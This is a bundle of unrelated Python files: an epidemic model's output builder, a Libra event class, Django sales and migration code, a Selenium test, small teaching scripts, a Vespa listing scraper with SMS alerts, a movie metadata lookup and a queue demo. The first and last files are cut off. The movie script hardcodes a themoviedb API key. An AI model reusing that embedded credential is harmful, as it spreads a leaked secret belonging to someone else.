source_pop_immunity_dist: Dict[str, float],
source_pop_protection: Dict[str, float],
):
"""
Work out how much we are going to adjust the age-specific hospitalisation and mortality rates by to account for pre-
existing immunity protection against hospitalisation and mortality.
The aim is to get the final parameters to come out so that the weighted average effect comes out to that reported by
Nyberg et al., while also acknowledging that there is vaccine-related immunity present in the population.
To do this, we estimate the proportion of the population in each of the three modelled immunity categories:
- The "none" immunity stratum - representing the entirely unvaccinated
- The "low" immunity stratum - representing people who have received two doses of an effective vaccine
(i.e. the ones used in the UK: ChAdOx, BNT162b2, mRNA1273)
- The "high" immunity stratum - representing people who have received their third dose of an mRNA vaccine
The calculation proceeds by working out the proportion of the UK population who would have been in each of these
three categories at the mid-point of the Nyberg study and using the estimated effect of the vaccine-related immunity
around then for each of these three groups.
We then work out the hospitalisation and mortality effect for each of these three groups that would be needed to
make the weighted average of the hospitalisation proportions come out to the original parameter values (and check
that this is indeed the case).
Returns:
The multipliers for the age-specific proportions for each of the immunity strata
"""
# Take the complement
immunity_effect = {k: 1.0 - v for k, v in source_pop_protection.items()}
# Work out the adjustments based on the protection provided by immunity
effective_weights = [
immunity_effect[stratum] * source_pop_immunity_dist[stratum] for stratum in IMMUNITY_STRATA
]
no_immunity_modifier = 1.0 / sum(effective_weights)
immune_modifiers = {
strat: no_immunity_modifier * immunity_effect[strat] for strat in IMMUNITY_STRATA
}
# Unnecessary check that the weighted average we have calculated does come out to one
msg = "Values used don't appear to create a weighted average with weights summing to one, something went wrong"
assert weighted_average(immune_modifiers, source_pop_immunity_dist, rounding=4) == 1.0, msg
return immune_modifiers
class SmCovidOutputsBuilder(OutputsBuilder):
def request_incidence(
self,
age_groups: List[str],
strain_strata: List[str],
incidence_flow: str,
request_incidence_by_age: bool,
):
"""
Calculate incident disease cases. This is associated with the transition to infectiousness if there is only one
infectious compartment, or transition between the two if there are two.
Note that this differs from the approach in the covid_19 model, which took entry to the first "active"
compartment to represent the onset of symptoms, which infectiousness starting before this.
Args:
age_groups: The modelled age groups
strain_strata: The modelled strains
incidence_flow: The name of the flow representing incident cases
request_incidence_by_age: Whether to save outputs for incidence by age
"""
# Unstratified
self.model.request_output_for_flow(name="incidence", flow_name=incidence_flow)
# Stratified
for agegroup in age_groups:
agegroup_string = f"Xagegroup_{agegroup}"
age_incidence_sources = []
for immunity_stratum in IMMUNITY_STRATA:
immunity_string = f"Ximmunity_{immunity_stratum}"
for strain in strain_strata:
strain_string = f"Xstrain_{strain}" if strain else ""
strain_filter = {"strain": strain} if strain else {}
dest_filter = {"agegroup": agegroup, "immunity": immunity_stratum}
dest_filter.update(strain_filter)
output_name = f"incidence{agegroup_string}{immunity_string}{strain_string}"
age_incidence_sources.append(output_name)
self.model.request_output_for_flow(
name=output_name,
flow_name=incidence_flow,
dest_strata=dest_filter,
save_results=False,
)
# Aggregated incidence by age
if request_incidence_by_age:
self.model.request_aggregate_output(
name=f"incidence{agegroup_string}",
sources=age_incidence_sources,
save_results=True,
)
def request_infection_deaths(
self,
model_times: np.ndarray,
age_groups: List[str],
strain_strata: List[str],
iso3: str,
region: Union[str, None],
ifr_prop_requests: AgeSpecificProps,
ve_death: float,
time_from_onset_to_death: TimeDistribution,
voc_params: Optional[Dict[str, VocComponent]],
):
"""
Request infection death-related outputs.
Args:
model_times: The model evaluation times
age_groups: Modelled age group lower breakpoints
strain_strata: The modelled strains
iso3: The ISO3 code of the country being simulated
region: The sub-region being simulated, if any
ifr_prop_requests: All the CFR-related requests, including the proportions themselves
ve_death: Vaccine efficacy against mortality
time_from_onset_to_death: Details of the statistical distribution for the time to death
voc_params: The strain-specific parameters
"""
ifr_request = ifr_prop_requests.values
age_ifr_props = Data(
np.array(convert_param_agegroups(iso3, region, ifr_request, age_groups))
)
ifr_multiplier = ifr_prop_requests.multiplier
# Pre-compute the probabilities of event occurrence within each time interval between model times
# death_distri_densities = Data(
# precompute_density_intervals(time_from_onset_to_death, model_times)
# )
death_distri_densities = build_density_interval_func(time_from_onset_to_death, model_times)
# Prepare immunity modifiers
immune_death_modifiers = {
ImmunityStratum.UNVACCINATED: 1.0,
ImmunityStratum.VACCINATED: 1.0 - ve_death,
}
# Request infection deaths for each age group
infection_deaths_sources = []
for age_idx, agegroup in enumerate(age_groups):
agegroup_string = f"Xagegroup_{agegroup}"
for immunity_stratum in IMMUNITY_STRATA:
immunity_string = f"Ximmunity_{immunity_stratum}"
# Adjust CFR proportions for immunity
age_immune_death_props = age_ifr_props * immune_death_modifiers[immunity_stratum]
for strain in strain_strata:
strain_string = f"Xstrain_{strain}" if strain else ""
# Find the strata we are working with and work out the strings to refer to
strata_string = f"{agegroup_string}{immunity_string}{strain_string}"
output_name = f"infection_deaths{strata_string}"
infection_deaths_sources.append(output_name)
# Calculate the multiplier based on age, immunity and strain
strain_risk_modifier = (
1.0 if not strain else voc_params[strain].death_risk_adjuster
)
death_risk = (
age_immune_death_props[age_idx] * strain_risk_modifier * ifr_multiplier
)
death_risk.node_name = f"death_risk{strata_string}"
# infection_deaths_func = Function(
# convolve_probability,
# [
# death_risk * DerivedOutput(f"incidence{strata_string}"),
# death_distri_densities,
# ],
# )
# Request the output
self.model.request_function_output(
name=output_name,
func=death_risk * DerivedOutput(f"incidence{strata_string}"),
save_results=False,
)
# Request aggregated infection deaths
self.model.request_aggregate_output(
name="infection_deaths_preconv", sources=infection_deaths_sources, save_results=False
)
infection_deaths_func = Function(
convolve_probability,
[
DerivedOutput("infection_deaths_preconv"),
death_distri_densities,
],
)
self.model.request_function_output(
name="infection_deaths",
func=infection_deaths_func,
)
def request_hospitalisations(
self,
model_times: np.ndarray,
age_groups: List[int],
strain_strata: List[str],
iso3: str,
region: Union[str, None],
symptomatic_prop_requests: Dict[str, float],
hosp_prop_requests: AgeSpecificProps,
ve_hospitalisation: float,
time_from_onset_to_hospitalisation: TimeDistribution,
hospital_stay_duration: TimeDistribution,
voc_params: Optional[Dict[str, VocComponent]],
):
"""
Request hospitalisation-related outputs.
Args:
model_times: The model evaluation times
age_groups: Modelled age group lower breakpoints
strain_strata: The names of the strains being implemented (or a list of an empty string if no strains)
iso3: The ISO3 code of the country being simulated
region: The sub-region being simulated, if any
symptomatic_prop_requests: The symptomatic proportions by age
hosp_prop_requests: The hospitalisation proportions given symptomatic infection
time_from_onset_to_hospitalisation: Details of the statistical distribution for the time to hospitalisation
hospital_stay_duration: Details of the statistical distribution for hospitalisation stay duration
voc_params: The parameters pertaining to the VoCs being implemented in the model
"""
symptomatic_props = convert_param_agegroups(
iso3, region, symptomatic_prop_requests, age_groups
)
hosp_props = Data(
np.array(convert_param_agegroups(iso3, region, hosp_prop_requests.values, age_groups))
)
# Get the adjustments to the hospitalisation rates according to immunity status
# or_adjuster_func = get_apply_odds_ratio_to_prop(hosp_prop_requests.multiplier)
# Prepare immunity modifiers
immune_hosp_modifiers = {
ImmunityStratum.UNVACCINATED: 1.0,
ImmunityStratum.VACCINATED: 1.0 - ve_hospitalisation,
}
# Pre-compute the probabilities of event occurrence within each time interval between model times
hospitalisation_density_intervals = build_density_interval_func(
time_from_onset_to_hospitalisation, model_times
)
# Request hospital admissions for each age group
hospital_admissions_sources = []
for agegroup_idx, agegroup in enumerate(age_groups):
agegroup_string = f"Xagegroup_{agegroup}"
for immunity_stratum in IMMUNITY_STRATA:
immunity_string = f"Ximmunity_{immunity_stratum}"
# Adjust the hospitalisation proportions for immunity
adj_hosp_props = hosp_props * immune_hosp_modifiers[immunity_stratum]
# adj_hosp_props = adj_hosp_props.apply(or_adjuster_func)
adj_hosp_props = Function(
apply_odds_ratio_to_proportion, [adj_hosp_props, hosp_prop_requests.multiplier]
)
for strain in strain_strata:
strain_string = f"Xstrain_{strain}" if strain else ""
# Find the strata we are working with and work out the strings to refer to
strata_string = f"{agegroup_string}{immunity_string}{strain_string}"
output_name = f"hospital_admissions{strata_string}"
hospital_admissions_sources.append(output_name)
# Calculate the multiplier based on age, immunity and strain
strain_risk_modifier = (
1.0 if not strain else voc_params[strain].hosp_risk_adjuster
)
hospital_risk_given_symptoms = (
adj_hosp_props[agegroup_idx] * strain_risk_modifier
)
hospital_risk_given_infection = (
hospital_risk_given_symptoms * symptomatic_props[agegroup]
)
# Get the hospitalisation function
# hospital_admissions_func = make_calc_admissions_func(
# hospital_risk_given_infection, interval_distri_densities
# )
# hospital_admissions_func = Function(
# convolve_probability,
# [
# hospital_risk_given_infection
# * DerivedOutput(f"incidence{strata_string}"),
# hospitalisation_density_intervals,
# ],
# )
# Request the output
self.model.request_function_output(
name=output_name,
func=hospital_risk_given_infection
* DerivedOutput(f"incidence{strata_string}"),
save_results=False,
)
# Request aggregated hospital admissions
self.model.request_aggregate_output(
name="hospital_admissions_preconv",
sources=hospital_admissions_sources,
save_results=False,
)
hospital_admissions_func = Function(
convolve_probability,
[
DerivedOutput("hospital_admissions_preconv"),
hospitalisation_density_intervals,
],
)
self.model.request_function_output(
name="hospital_admissions",
func=hospital_admissions_func,
save_results=True,
)
# Request aggregated hospital occupancy
probas_stay_greater_than = build_probas_stay_func(hospital_stay_duration, model_times)
# hospital_occupancy_func = make_calc_occupancy_func(probas_stay_greater_than)
hospital_occupancy_func = Function(
convolve_probability,
[
DerivedOutput("hospital_admissions"),
probas_stay_greater_than,
],
)
self.model.request_function_output(
name="hospital_occupancy", func=hospital_occupancy_func
)
def request_peak_hospital_occupancy(self):
"""
Create an output for the peak hospital occupancy. This is stored as a timeseries, although this is
actually a constant output.
"""
def array_max(x):
return jnp.repeat(jnp.max(x), jnp.size(x))
peak_func = Function(array_max, [DerivedOutput("hospital_occupancy")])
self.model.request_function_output(
"peak_hospital_occupancy",
func=peak_func
)
# def request_icu_outputs(
# self,
# prop_icu_among_hospitalised: float,
# time_from_hospitalisation_to_icu: TimeDistribution,
# icu_stay_duration: TimeDistribution,
# strain_strata: List[str],
# model_times: np.ndarray,
# voc_params: Optional[Dict[str, VocComponent]],
# age_groups: List[int],
# ):
# """
# Request ICU-related outputs.
# Args:
# prop_icu_among_hospitalised: Proportion ever requiring ICU stay among hospitalised cases (float)
# time_from_hospitalisation_to_icu: Details of the statistical distribution for the time to ICU admission
# icu_stay_duration: Details of the statistical distribution for ICU stay duration
# strain_strata: The names of the strains being implemented (or a list of an empty string if no strains)
# model_times: The model evaluation times
# voc_params: The parameters pertaining to the VoCs being implemented in the model
# age_groups: Modelled age group lower breakpoints
# """
# # Pre-compute the probabilities of event occurrence within each time interval between model times
# interval_distri_densities = precompute_density_intervals(time_from_hospitalisation_to_icu, model_times)
# icu_admissions_sources = []
# for agegroup in age_groups:
# agegroup_string = f"Xagegroup_{agegroup}"
# for immunity_stratum in IMMUNITY_STRATA:
# immunity_string = f"Ximmunity_{immunity_stratum}"
# for strain in strain_strata:
# strain_string = f"Xstrain_{strain}" if strain else ""
# strata_string = f"{agegroup_string}{immunity_string}{strain_string}"
# output_name = f"icu_admissions{strata_string}"
# icu_admissions_sources.append(output_name)
# # Calculate the multiplier based on age, immunity and strain
# strain_risk_modifier = 1. if not strain else voc_params[strain].icu_multiplier
# icu_risk = prop_icu_among_hospitalised * strain_risk_modifier
# # Request ICU admissions
# icu_admissions_func = make_calc_admissions_func(icu_risk, interval_distri_densities)
# self.model.request_function_output(
# name=output_name,
# sources=[f"hospital_admissions{strata_string}"],
# func=icu_admissions_func,
# save_results=False,
# )
# # Request aggregated icu admissions
# self.model.request_aggregate_output(
# name="icu_admissions",
# sources=icu_admissions_sources,
# )
# # Request ICU occupancy
# probas_stay_greater_than = precompute_probas_stay_greater_than(icu_stay_duration, model_times)
# icu_occupancy_func = make_calc_occupancy_func(probas_stay_greater_than)
# self.model.request_function_output(
# name="icu_occupancy",
# sources=["icu_admissions"],
# func=icu_occupancy_func,
# )
def request_recovered_proportion(self, base_comps: List[str]):
"""
Track the total population ever infected and the proportion of the total population.
Args:
base_comps: The unstratified model compartments
"""
# All the compartments other than the fully susceptible have been infected at least once
ever_infected_compartments = [
comp for comp in base_comps if comp != Compartment.SUSCEPTIBLE
]
self.model.request_output_for_compartments(
"ever_infected",
ever_infected_compartments,
)
self.model.request_function_output(
"prop_ever_infected",
func=DerivedOutput("ever_infected") / DerivedOutput("total_population")
)
def request_age_matched_recovered_proportion(self, base_comps: List[str], age_groups: List[str], sero_age_min, sero_age_max):
"""
Track the total population ever infected and the proportion of the total population.
Args:
base_comps: The unstratified model compartments
"""
# if no age restriction in the survey, just copy the overall sero-prevalence
if sero_age_min is None and sero_age_max is None:
self.model.request_aggregate_output(
"prop_ever_infected_age_matched",
sources =[DerivedOutput("prop_ever_infected")]
)
# otherwise, we need to workout out the matching modelled age bands and create the relevant output
else:
# All the compartments other than the fully susceptible have been infected at least once
ever_infected_compartments = [
comp for comp in base_comps if comp != Compartment.SUSCEPTIBLE
]
# Work out the modelled age_bands to be included
if sero_age_min is not None: # find the largest lower bound that is smaller than or equal to sero_age_min
youngest_model_agegroup = max([int(age) for age in age_groups if int(age) <= sero_age_min])
else:
youngest_model_agegroup = 0
if sero_age_max is not None:
oldest_model_agegroup = max([int(age) for age in age_groups if int(age) < sero_age_max])
else:
oldest_model_agegroup = max([int(age) for age in age_groups])
included_age_strats = [age for age in age_groups if youngest_model_agegroup <= int(age) and int(age) <= oldest_model_agegroup]
# Loop through all included age groups to calculate their respective number of recovered and popsize
infected_output_names = []
total_pop_output_names = []
for age_strat in included_age_strats:
this_infected_output = f"ever_infected_age_{age_strat}"
this_total_pop_output = f"total_pop_age_{age_strat}"
age_strata_filter = {"agegroup": age_strat}
self.model.request_output_for_compartments(
this_infected_output,
compartments=ever_infected_compartments,
strata=age_strata_filter,
save_results=False
)
infected_output_names.append(this_infected_output)
self.model.request_output_for_compartments(
this_total_pop_output,
compartments=base_comps,
strata=age_strata_filter,
save_results=False
)
total_pop_output_names.append(this_total_pop_output)
self.model.request_aggregate_output(
"ever_infected_age_matched",
sources=infected_output_names,
save_results=False
)
self.model.request_aggregate_output(
"total_population_age_matched",
sources=total_pop_output_names,
save_results=False
)
self.model.request_function_output(
"prop_ever_infected_age_matched",
func=DerivedOutput("ever_infected_age_matched") / DerivedOutput("total_population_age_matched")
)
def request_random_process_outputs(
self,
):
self.model.request_computed_value_output("transformed_random_process")
def request_immunity_props(self, immunity_strata, age_pops, request_immune_prop_by_age):
"""
Track population distribution across immunity stratification, to make sure vaccination stratification is working
correctly.
Args:
strata: Immunity strata being implemented in the model
age_pops: Population size by age group
request_immune_prop_by_age: Whether to request age-specific immunity proportions
"""
for immunity_stratum in immunity_strata:
n_immune_name = f"n_immune_{immunity_stratum}"
prop_immune_name = f"prop_immune_{immunity_stratum}"
self.model.request_output_for_compartments(
n_immune_name,
self.compartments,
{"immunity": immunity_stratum},
)
self.model.request_function_output(
prop_immune_name,
func=DerivedOutput(n_immune_name) / DerivedOutput("total_population")
)
# Calculate age-specific proportions if requested
if request_immune_prop_by_age:
for agegroup, popsize in age_pops.items():
n_age_immune_name = f"n_immune_{immunity_stratum}Xagegroup_{agegroup}"
prop_age_immune_name = f"prop_immune_{immunity_stratum}Xagegroup_{agegroup}"
self.model.request_output_for_compartments(
n_age_immune_name,
self.compartments,
{"immunity": immunity_stratum, "agegroup": agegroup},
save_results=False,
)
self.model.request_function_output(
prop_age_immune_name,
func=make_age_immune_prop_func(popsize)(DerivedOutput(n_age_immune_name))
)
def request_cumulative_outputs(self, requested_cumulative_outputs, cumulative_start_time):
"""
Compute cumulative outputs for requested outputs.
Args:
requested_cumulative_outputs: List of requested derived outputs to accumulate
cumulative_start_time: reference time for cumulative output calculation
"""
for output in requested_cumulative_outputs:
self.model.request_cumulative_output(
name=f"cumulative_{output}", source=output, start_time=cumulative_start_time
)
def request_student_weeks_missed_output(self, n_student_weeks_missed):
"""
Store the number of students*weeks of school missed. This is a single float that will be stored as a derived output
"""
def repeat_val(example_output, n_student_weeks_missed):
return jnp.repeat(n_student_weeks_missed, jnp.size(example_output))
student_weeks_missed_func = Function(repeat_val, [DerivedOutput("total_population"), n_student_weeks_missed])
self.model.request_function_output(
"student_weeks_missed",
func=student_weeks_missed_func
)
def build_statistical_distribution(distribution_details: TimeDistribution):
"""
Generate a scipy statistical distribution object that can then be used multiple times to evaluate the cdf
Args:
distribution_details: User request parameters that define the distribution
Returns:
A scipy statistical distribution object
"""
from scipy import stats
if distribution_details.distribution == "gamma":
shape = distribution_details.parameters["shape"]
scale = distribution_details.parameters["mean"] / shape
return stats.gamma(a=shape, scale=scale)
def build_density_interval_func(dist: TimeDistribution, model_times):
lags = Data(model_times - model_times[0])
shape = dist.shape
scale = dist.mean / dist.shape
cdf_values = Function(gamma_cdf, [shape, scale, lags])
interval_distri_densities = Function(jnp.gradient, [cdf_values])
return interval_distri_densities
def build_probas_stay_func(dist: TimeDistribution, model_times):
lags = Data(model_times - model_times[0])
shape = dist.shape
scale = dist.mean / dist.shape
cdf_values = Function(gamma_cdf, [shape, scale, lags])
probas_stay_greater_than = 1.0 - cdf_values
return probas_stay_greater_than
def convolve_probability(source_output, density_kernel):
return jnp.convolve(source_output, density_kernel)[0 : len(source_output)]
def make_age_immune_prop_func(popsize):
"""
Create a simple function to calculate immune proportion for a given age group
Args:
popsize: Population size of the relevant age group
Returns:
A function converitng a number of individuals into the associated proportion among the relevant age group
"""
def age_immune_prop_func(n_immune):
return n_immune / popsize
return age_immune_prop_func
|
from canoser import *
from libra.hasher import gen_hasher
EVENT_KEY_LENGTH = 32
class EventKey(DelegateT):
delegate_type = [Uint8, EVENT_KEY_LENGTH]
class EventHandle(Struct):
_fields = [
('count', Uint64),
('key', EventKey)
]
class ContractEvent(Struct):
_fields = [
('key', EventKey),
('sequence_number', Uint64),
('event_data', [Uint8])
]
@classmethod
def from_proto(cls, proto):
ret = cls()
ret.key = bytes_to_int_list(proto.key)
ret.sequence_number = proto.sequence_number
ret.event_data = bytes_to_int_list(proto.event_data)
return ret
def hash(self):
shazer = gen_hasher(b"ContractEvent")
shazer.update(self.serialize())
return shazer.digest()
|
from QualiaII.models import tblVenta, tblSurtido, tblProducto
def calculoInversion(listaProductos):
productosCompras = {}
inversionProductos = {}
acumulador = 0
for var2 in listaProductos:
if tblSurtido.objects.filter(producto=var2).exists():
apariciones = tblSurtido.objects.filter(producto=var2)
for a in apariciones:
acumulador = acumulador + a.cantidad
productosCompras[var2] = acumulador
acumulador = 0
else:
productosCompras[var2] = 0 #Ya tengo las compras totales de cada producto
for cla, val in productosCompras.items():
prodRecup = tblProducto.objects.get(id=cla)
cosProd = prodRecup.costo
inversionEnEste = cosProd*val
inversionProductos[cla] = inversionEnEste
return inversionProductos
def calculoGanancia(listaProductos):
productosVentas = {}
gananciaProductos = {}
acumulador = 0
for var2 in listaProductos:
if tblVenta.objects.filter(producto=var2).exists():
apariciones = tblVenta.objects.filter(producto=var2)
for a in apariciones:
acumulador = acumulador + a.cantidad
productosVentas[var2] = acumulador
acumulador = 0
else:
productosVentas[var2] = 0 # Ya tengo las ventas totales de cada producto
for cla, val in productosVentas.items():
prodRecup = tblProducto.objects.get(id=cla)
preProd = prodRecup.precio
gananciaEnEste = preProd * val
gananciaProductos[cla] = gananciaEnEste
return gananciaProductos
def calculoInversionAcumulada(listaProductos):
productosCompras = {}
acumulador = 0
inversion = 0
for var2 in listaProductos:
if tblSurtido.objects.filter(producto=var2).exists():
apariciones = tblSurtido.objects.filter(producto=var2)
for a in apariciones:
acumulador = acumulador + a.cantidad
productosCompras[var2] = acumulador
acumulador = 0
else:
productosCompras[var2] = 0 #Ya tengo las compras totales de cada producto
for cla, val in productosCompras.items():
prodRecup = tblProducto.objects.get(id=cla)
cosProd = prodRecup.costo
inversionEnEste = cosProd*val
inversion = inversion + inversionEnEste
return inversion
def calculoGananciaAcumulada(listaProductos):
productosVentas = {}
acumulador = 0
ganancia = 0
for var2 in listaProductos:
if tblVenta.objects.filter(producto=var2).exists():
apariciones = tblVenta.objects.filter(producto=var2)
for a in apariciones:
acumulador = acumulador + a.cantidad
productosVentas[var2] = acumulador
acumulador = 0
else:
productosVentas[var2] = 0 # Ya tengo las ventas totales de cada producto
for cla, val in productosVentas.items():
prodRecup = tblProducto.objects.get(id=cla)
preProd = prodRecup.precio
gananciaEnEste = preProd * val
ganancia = ganancia + gananciaEnEste
return ganancia |
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from .base import FunctionalTest
class NewVisitorTest(FunctionalTest):
def test_can_start_a_list_and_retreive_it_later(self):
# User navigates to the main page of the website.
self.browser.get(self.live_server_url)
# The website title suggests it's another boring todo list app.
self.assertIn('To-Do', self.browser.title)
header_text = self.browser.find_element_by_tag_name('h1').text
self.assertIn('To-Do', header_text)
# User is welcomed with a window to enter a list item.
inputbox = self.get_item_input_box()
self.assertEqual(
inputbox.get_attribute('placeholder'),
'Enter a to-do item'
)
# User types in "feed my cat" to a textbox.
inputbox.send_keys('feed my cat')
# User submits the item by hitting enter,
# the list item is now displayed on the website.
inputbox.send_keys(Keys.ENTER)
self.wait_for_row_in_list_table('1: feed my cat')
def test_multiple_users_can_start_lists_at_different_urls(self):
# User creates his own list.
self.browser.get(self.live_server_url)
inputbox = self.get_item_input_box()
inputbox.send_keys('feed my cat')
inputbox.send_keys(Keys.ENTER)
self.wait_for_row_in_list_table('1: feed my cat')
# When new list is created a unique URL should be generated.
personal_url = self.browser.current_url
self.assertRegex(personal_url, '/lists/.+')
# New users comes in and creates a list.
self.browser.quit()
self.browser = webdriver.Firefox()
# User does not find the previous users list.
self.browser.get(self.live_server_url)
page_text = self.browser.find_element_by_tag_name('body').text
self.assertNotIn('feed my cat', page_text)
# Now the users creates his own list.
inputbox = self.get_item_input_box()
inputbox.send_keys('pet my doggo')
inputbox.send_keys(Keys.ENTER)
self.wait_for_row_in_list_table('1: pet my doggo')
# He gets his own URL.
next_personal_url = self.browser.current_url
self.assertRegex(next_personal_url, '/lists/.+')
self.assertNotEqual(personal_url, next_personal_url)
# No trace of previous users list items.
page_text = self.browser.find_element_by_tag_name('body').text
self.assertNotIn('feed my cat', page_text)
|
#This program calculates Body Mass Index (BMI)
#author: Angelina Belotserkovskaya
# Asks to input height in cm and saves it into variable
# which is converted into int
height = int(input('Please enter your height in centimetres: '))
# Convert cm to m2
height = (height**2) / 10000
# Asks to input weight in kg and saves it into variable
# which is converted into int
weight = int(input('Please enter your weight in kg: '))
# Calculating bmi
bmi = weight/height
print ('Your BMI is {:.2f}'.format(bmi)) |
#Escribir un programa que pregunte al usuario por el número de horas trabajadas y el coste por hora. Después debe mostrar por pantalla la paga que le corresponde.
def run(salario,horas):
dinero_ganado = salario * horas
print("Has ganado {} dólares".format(dinero_ganado))
if __name__ == "__main__":
salario = float(input("¿Cuanto ganas en dólares por hora?: "))
horas = int(input("¿Cuantas horas trabajaste?: "))
run(salario,horas) |
# Generated by Django 2.2 on 2020-09-10 10:30
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0004_auto_20200910_1017'),
]
operations = [
migrations.AddField(
model_name='review',
name='review_date',
field=models.DateTimeField(default=datetime.datetime(2020, 9, 10, 10, 30, 47, 527046), verbose_name='date published'),
),
]
|
#!/usr/bin/env python
# encoding: utf-8
from collections import namedtuple , deque , defaultdict , OrderedDict , Counter
Ponit = namedtuple('Point',['x','y'])
p = Ponit(1,2)
print (p.x)
print (p.y)
# 索引是自定义的x,y
q = deque(['x','y','z'])
q.append('a')
q.appendleft('b')
print (q)
dd = defaultdict(lambda:'N/A')
dd['key1'] = 'abc'
print (dd['key'] )
print (dd['key1'])
# 按照插入的顺序排列
od = OrderedDict()
od['z'] = 1
od['y'] = 2
od['x'] = 3
print (list(od.keys()))
# 计数器,计算各个字符出现的次数
c = Counter()
for ch in 'programing' :
c[ch] += 1
print (c)
|
# Libraries export
from bs4 import BeautifulSoup
import requests
import pandas as pd
from twilio.rest import Client
# regex module
import re
# lbc search
url = 'https://www.leboncoin.fr/motos/offres/provence_alpes_cote_d_azur/?th=1&q=*vespa%20gt*%20OR%20PX%20OR%20LML%20NOT%20solex%20NOT%20ciao%20NOT%20gts%20NOT%20gt-s%20NOT%20200%20NOT%20neuf%20NOT%20trail%20NOT%20Kymco%20NOT%20Suzuki%20NOT%20GTV&it=1&parrot=2&ps=4'
# Request content from web page
result = requests.get(url)
c = result.content
# Set as Beautiful Soup Object
soup = BeautifulSoup(c)
# Take all title and price tag
summary = soup.findAll('a', {'class':'list_item clearfix trackable'})
# title
ad_title = summary[0].get('title')
# price
ad_price = soup.find_all('h3', class_='item_price')
ad_price = ad_price[0].get('content')
ad_price
# list id
get_numeric = r'\d+'
listid = re.findall(get_numeric, str(summary[0]))
ad_list_id = listid[0]
# url
ad_url = summary[0].get('href')
# publication date
ad_publication_date = soup.find_all('p', class_='item_supp')
ad_publication_date = ad_publication_date[2].get('content')
# gest last ad_list_id
previous_ad_list_id = pd.read_csv('df_vespa.csv', sep=';')
previous_ad_list_id = previous_ad_list_id.ad_list_id.iloc[-1]
previous_ad_list_id = str(previous_ad_list_id)
# Check if there is a new ad
if previous_ad_list_id != ad_list_id:
# send new sms
account = "*****************"
token = "**********"
client = Client(account, token)
message = client.messages.create(to="+**********",
from_="+**********",
body="""
Hello Dad! Nouvelle annonce à consulter : """
+ ad_title
+ ' - '
+ ad_price
+ ' - '
+ ad_url
+ ' - Fonce !' )
# add the new ad to the df_vespa.csv
new_vespa_ad = {'ad_title' : ad_title, 'ad_list_id' : ad_list_id, 'ad_url' : ad_url}
new_vespa_ad = pd.DataFrame(index=[ad_publication_date], data=new_vespa_ad)
# append date and retention value to the csv
new_vespa_ad.to_csv('df_vespa.csv', mode='a', header=False, encoding='UTF-8', sep=';')
# print log
print('New available ad:')
print(ad_title)
print('---')
print(ad_price)
print('---')
print(ad_publication_date)
print('---')
print(ad_list_id)
print('---')
print(ad_url)
else:
print('No new Ad')
|
from morepath import redirect
from onegov.core.security import Secret
from onegov.translator_directory import _
from onegov.translator_directory import TranslatorDirectoryApp
from onegov.translator_directory.forms.mutation import ApplyMutationForm
from onegov.translator_directory.layout import ApplyTranslatorChangesLayout
from onegov.translator_directory.models.message import \
TranslatorMutationMessage
from onegov.translator_directory.models.mutation import TranslatorMutation
@TranslatorDirectoryApp.form(
model=TranslatorMutation,
name='apply',
template='form.pt',
permission=Secret,
form=ApplyMutationForm
)
def apply_translator_mutation(self, request, form):
if form.submitted(request):
form.update_model()
request.success(_("Proposed changes applied"))
TranslatorMutationMessage.create(
self.ticket,
request,
'applied',
form.changes.data
)
if 'return-to' in request.GET:
return request.redirect(request.url)
return redirect(request.link(self))
else:
form.apply_model()
layout = ApplyTranslatorChangesLayout(self.target, request)
return {
'layout': layout,
'title': _("Apply proposed changes"),
'form': form
}
|
# -*- coding: cp1252 -*-
import codecs
import simplejson
import requests
#rotten_tomatoes_key = 'mq7dazg2njhpky3u5g5qqy6x'
# http://developer.rottentomatoes.com/docs
# http://www.omdbapi.com/?i=&t=Nina%27s+Heavenly+Delights
# http://www.imdb.com/xml/find?json=1&nr=1&q=Nina's+Heavenly+Delights
themoviedb_key = '8df14339012799a50c81f9119908160b'
# http://api.themoviedb.org/3/search/movie?api_key=8df14339012799a50c81f9119908160b&query=Nina's+Heavenly+Delights
# http://api.themoviedb.org/3/movie/12808?api_key=8df14339012799a50c81f9119908160b
search_url = "http://api.themoviedb.org/3/search/movie?api_key={0}&query={1}"
get_url = "http://api.themoviedb.org/3/movie/{0}?api_key={1}"
f = codecs.open('Book1.csv', encoding='cp1252')
out = codecs.open('Book1-filled.csv', encoding='utf-8', mode='w+')
line = f.readline();
cols = line.split(',')
print '\n----\n'
out.write('Input Title,Input Year,Country 1,Country 2,Country 3,Country 4,Language 1,Language 2,Language 3,Language 4,Lang 1,Lang 2,Lang 3,Lang 4,Output Title (for verification),Output Release Date (for verification)\n');
cache = dict()
limit = 10000000
line_id = 0
for line in f:
line_id = line_id + 1
if line_id > limit:
break
vals = line.split(',')
year = vals[-1].strip('\n\r')
title = ','.join(vals[:-1])
title = title.strip('"')
if line in cache:
movie_countries = cache[line]['movie_countries']
movie_languages = cache[line]['movie_languages']
movie_langs = cache[line]['movie_langs']
print 'CACHE!'
else:
movie_countries = ['', '', '', '']
movie_languages = ['', '', '', '']
movie_langs = ['', '', '', '']
qtitle = title.replace(' ', '+').encode('utf-8')
query = search_url.format(themoviedb_key, qtitle)
resp = requests.get(url=query)
if resp and resp.content:
data = simplejson.loads(resp.content)
results = data['results']
if len(results) == 0:
print 'NO MOVIE FOUND :((('
else:
result = results[0]
movie_id = result['id']
query = get_url.format(movie_id, themoviedb_key)
resp = requests.get(url=query)
data = simplejson.loads(resp.content)
original_title = data['original_title']
release_date = data['release_date']
countries = data['production_countries']
if len(countries) > 0:
movie_country = ""
idx = 0
for country in countries:
movie_countries[idx] = country['name']
idx = idx + 1
if idx >= 4:
break
languages = data['spoken_languages']
if len(languages) > 0:
movie_language = ""
idx = 0
for language in languages:
movie_languages[idx] = language['name']
movie_langs[idx] = language['iso_639_1']
idx = idx + 1
if idx >= 4:
break
cache[line] = {
'movie_countries': movie_countries,
'movie_languages': movie_languages,
'movie_langs': movie_langs
}
output_line = '"' + title + '",' + year + ',' + ','.join(movie_countries) + ',' + ','.join(movie_languages) + ',' + ','.join(movie_langs) + ',"' + original_title + '",' + release_date + ''
print output_line
out.write(output_line + '\n')
|
#queue
class Queue:
def __init__(self):
self.stack = []
def push(self, a):
self.stack.append(a)
def pop(self):
return self.stack.pop(0)
def is_empty(self):
return not self.stack
if __name__ == '__main__':
quantum = 100
tasks = [("p1", 150), ("p2", 80), ("p3", 200), ("p4", 350), ("p5", 20)]
queue = Queue()
for e in tasks:
queue.push(e)
elapsed_time = 0
while not queue.is_empty():
task = queue.pop()
